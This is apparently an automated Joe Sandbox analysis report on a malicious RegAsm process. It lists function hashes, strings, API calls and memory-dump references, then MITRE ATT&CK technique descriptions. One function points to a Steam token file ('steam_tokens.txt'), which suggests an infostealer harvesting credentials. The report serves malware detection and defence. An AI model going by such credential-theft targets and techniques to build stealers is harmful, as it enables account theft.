Opcode ID: 12242bc0293de05ac302777b178eb301e099698fcc5072f63438cd819ae88aa3
Instruction ID: 17c8abfd086c4242cac122bf8845915d66db02a54e4c925201d61540ef89ab3d
Opcode Fuzzy Hash: 12242bc0293de05ac302777b178eb301e099698fcc5072f63438cd819ae88aa3
Instruction Fuzzy Hash: 7C4158778043528FEB108A2CEC457DA7B969F51320F040A2EFCE5573D2E626E658C3B2

Function 1B3E55D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 1B3E569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 1B3E56D1

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 742cc74de3613d7aaf846bbaaa8bfde51c484d48b54c69a99a172a6079b4be74
Instruction ID: c822c8e29d478e1b0127edd94508e9aeb756d05223fd09abedc716fa3395c703
Opcode Fuzzy Hash: 742cc74de3613d7aaf846bbaaa8bfde51c484d48b54c69a99a172a6079b4be74
Instruction Fuzzy Hash: 03314BB2E002316BEB146E389DC89D6771CA7A0262F43173BE947D62D1F720C86CC6B1

Function 1B3ED300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B3ED3D5

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 845f613aa4b3042a81ad6e7e56a53232a6c1f1f94ab6a86bf63478e941cb9abb
Instruction ID: ae3089f6ad20d030190429c4d44fd666ea124db7b594aa36f89775cf127d1462
Opcode Fuzzy Hash: 845f613aa4b3042a81ad6e7e56a53232a6c1f1f94ab6a86bf63478e941cb9abb
Instruction Fuzzy Hash: 34316CB69042345BDB114A18AC01BE6775A9B81325F2803DAF8956B3D2D227E86683B1

Function 1B4CDEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1B4CDF4F
sqlite_stat1, xrefs: 1B4CDF30

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: c374010384e7605849e1dbd2c2e923dd245fc239e4b3efd16607ea06fc4f0d40
Instruction ID: d4be0a1aaab8a4e7dd872cd3c1413bb544fd19f6925618b7ad6996e966d63fa7
Opcode Fuzzy Hash: c374010384e7605849e1dbd2c2e923dd245fc239e4b3efd16607ea06fc4f0d40
Instruction Fuzzy Hash: A421A079A013465BDB10DF25DC80EABB7A4BF85A24B05826CFCC49B351E721FC15CBA1

Function 1B567E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 1B567ED9

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: e39a8fc1749eae46f0a0edcdfb2db03ed23b29d105166255802c868c26a74e1d
Instruction ID: 07808cb9ff0995656b34c7ef7c6a1863c525b86603f22eb66deeb223f17c9638
Opcode Fuzzy Hash: e39a8fc1749eae46f0a0edcdfb2db03ed23b29d105166255802c868c26a74e1d
Instruction Fuzzy Hash: CF219DB1600221ABFB089B74DC89B9B77ADFF98396F40052AF949D1150EB30DD18D7A2

Function 1B3FF740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1B3FF752

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: d434ee8790ec8bc63b4bf79b250104818f66386fc3bb66524ea40ea19d75d16a
Instruction ID: 75322b19be70dd4bed88e46ba4b4c478f4dccd1d0ad95f23c9328542836c7a75
Opcode Fuzzy Hash: d434ee8790ec8bc63b4bf79b250104818f66386fc3bb66524ea40ea19d75d16a
Instruction Fuzzy Hash: 401194B9500111AFE704AB29DCC9FABB3ACEF94246F80022EFD0592150E760E95CC7A6

Function 1B3D141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 1B5B0E84
GetXStateFeaturesMask, xrefs: 1B5B0E34

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 999364fc4817b43972789efd12a414b095ccbce3635735856b5dac254caba087
Instruction ID: 66d30d551ba5c064954518eb0b4dd1ea51a38ecd2b7b51597e0f2acc17a76a3f
Opcode Fuzzy Hash: 999364fc4817b43972789efd12a414b095ccbce3635735856b5dac254caba087
Instruction Fuzzy Hash: 1401843254022877EF153B51CD06ECEBF2AEB987A2F454019FD1869214DA72DC71DAE0

Function 0040EAF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040EB38
memcpy.MSVCRT ref: 0040EB68

Strings

string too long, xrefs: 0040EB33

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentmemcpystd::_
String ID: string too long
API String ID: 1835169507-2556327735
Opcode ID: fa4b1c0f3ff0128776813967c0443e1a9013f2b81733b7631f982d6049fd671a
Instruction ID: d13f591144cd0a305f71d56a585c18210e308866ad84656afb21758113ebd608
Opcode Fuzzy Hash: fa4b1c0f3ff0128776813967c0443e1a9013f2b81733b7631f982d6049fd671a
Instruction Fuzzy Hash: A51193313002109BDB30EE6E8941A6AB7F9EF81754B100E3FF957AB2C1C779A915879D

Function 0040EB8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040EBA6

Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8D5
Part of subcall function 0041F8C0: __CxxThrowException@8.LIBCMT ref: 0041F8EA
Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8FB

Part of subcall function 0040E995: std::_Xinvalid_argument.LIBCPMT ref: 0040E9A6

memcpy.MSVCRT ref: 0040EC01

Strings

invalid string position, xrefs: 0040EBA1

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position
API String ID: 214693668-1799206989
Opcode ID: ae77ffdfc47022a8a60ba760d4206afb9359add9840ca842f88b66a5f1a16f31
Instruction ID: ac5b7786e7b3f95b41f7ed6bbea4d28c235153f3436163c639e67f904456050a
Opcode Fuzzy Hash: ae77ffdfc47022a8a60ba760d4206afb9359add9840ca842f88b66a5f1a16f31
Instruction Fuzzy Hash: 5B11E9313082109BDB14DE1ED881A56B3B59B82714F100D3FF912AB3C1D779E951C799

Function 1B405350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 1B40539B

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 4a93303fe0e469cf21936e918b10951f92c021ca55d9d7ac0b8c672cba5f75f8
Instruction ID: 600c21d2355846532e0093f791eaf9b8bd50171ad090120837fc306f9f627fd2
Opcode Fuzzy Hash: 4a93303fe0e469cf21936e918b10951f92c021ca55d9d7ac0b8c672cba5f75f8
Instruction Fuzzy Hash: F01151B66083418BDB04CF15C8527DBB7E5AFD8214F84482EE48A87390DB74D508CB93

Function 00415819 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041581E

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00427717), ref: 0041586F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00415887

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 40794102-3507145866
Opcode ID: b847c0f44f557ce6e992e73fd76c9a74267dec6ed28e142c3af01dc19879183d
Instruction ID: 2a0cb05d35fedfa91472e2863b767981a8059701dc682e1ba57e3d770e4c47ac
Opcode Fuzzy Hash: b847c0f44f557ce6e992e73fd76c9a74267dec6ed28e142c3af01dc19879183d
Instruction Fuzzy Hash: 49210B71C00258EACB15EBA5C956BDDBB78AF18308F10415EE41572192DBBC2788CAA6

Function 0040E7DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040E7F2

Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8D5
Part of subcall function 0041F8C0: __CxxThrowException@8.LIBCMT ref: 0041F8EA
Part of subcall function 0041F8C0: std::exception::exception.LIBCMT ref: 0041F8FB

memmove.MSVCRT ref: 0040E82B

Strings

invalid string position, xrefs: 0040E7ED

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 1c6b3250254dda46204e7702984f49c1fd95d5f52b390f115c4c8eddc2bb16af
Instruction ID: eaad7f4bdf5f907b9c004e2f7eb1296418dcbaf0f54c6d6ec0e0debac3bd768b
Opcode Fuzzy Hash: 1c6b3250254dda46204e7702984f49c1fd95d5f52b390f115c4c8eddc2bb16af
Instruction Fuzzy Hash: F501DD727042114BD724AE69D9C4457B7A9DBC1710724CD3FE441D7381DB79EC5683AC

Function 1B407200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

Strings

invalid, xrefs: 1B40721B
API call with %s database connection pointer, xrefs: 1B407220

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$invalid
API String ID: 0-3574585026
Opcode ID: 5b2a05dacce22017f5f00de8bcf19d89093be67d22cceb012d7f4468dd983cfb
Instruction ID: 652abc7c0d9919fab1d86a90f98664e475251ef168030c1fb4182340202b4bc8
Opcode Fuzzy Hash: 5b2a05dacce22017f5f00de8bcf19d89093be67d22cceb012d7f4468dd983cfb
Instruction Fuzzy Hash: AEF0F671F046505BDA109A28EC24BE377EA5F50322F008A7DF6D692390CA20F854C2A3

Function 1B3DB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1B3DB238
misuse, xrefs: 1B3DB233

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$misuse
API String ID: 0-2530468415
Opcode ID: a5df5804c1b68e24f27821a0c24d5bce26e36fcc81c9325700507acda512c3f5
Instruction ID: 84fbd1f861ff587cd89929b6cee6be07905910dffc8ec4c79048815292725c61
Opcode Fuzzy Hash: a5df5804c1b68e24f27821a0c24d5bce26e36fcc81c9325700507acda512c3f5
Instruction Fuzzy Hash: D2C0C022800308F2CB00FF58EC43CC8AB309F94B01BCC8164E22518086D310D17C8391

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
